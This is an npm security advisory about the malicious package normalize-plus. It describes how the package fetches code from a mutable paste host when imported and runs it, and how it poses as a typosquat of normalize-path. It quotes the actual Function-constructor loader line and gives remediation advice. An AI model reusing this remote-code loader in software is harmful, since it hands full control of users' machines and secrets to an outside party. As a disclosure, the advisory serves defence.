npm · Malicious package advisory
Malwarenormalize-plus
MAL-2026-6399
Malicious code in normalize-plus (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (a8d9638f9c3f81ac15972cf2ff227b2d426a72c5e37035e54402648fe8120675)
On import, normalize-plus's top-level initPlugin() performs an HTTP GET against https://jsonkeeper.com/b/CI3HT, parses the JSON response, and evaluates its `cookie` field through the Function constructor: `const handler = new (Function.constructor)('require', JSON.parse(b).cookie); if (handler) handler(require);` (index.js line 74; URL default at line 65). The `require` symbol is then passed into the dynamically-constructed function, granting the remote payload full Node.js module-loading and filesystem privileges in any consumer that requires this package. jsonkeeper.com is a mutable anonymous paste host, so the maintainer can swap the executed code at any time without republishing the package. The package additionally mimics the API of the widely-used `normalize-path` package (exporting a `normalizePath` function) and self-describes as 'Stylus porting of normalize.css', combining a typosquat lure with an import-time remote-code-execution dropper.
## Source: ghsa-malware (68736aa001dbb92a66fb97c6f5592b47bd0bafdcb56a325a4c8595f0b10829c7)
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Compromised versions (1)
- 3.6.6
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.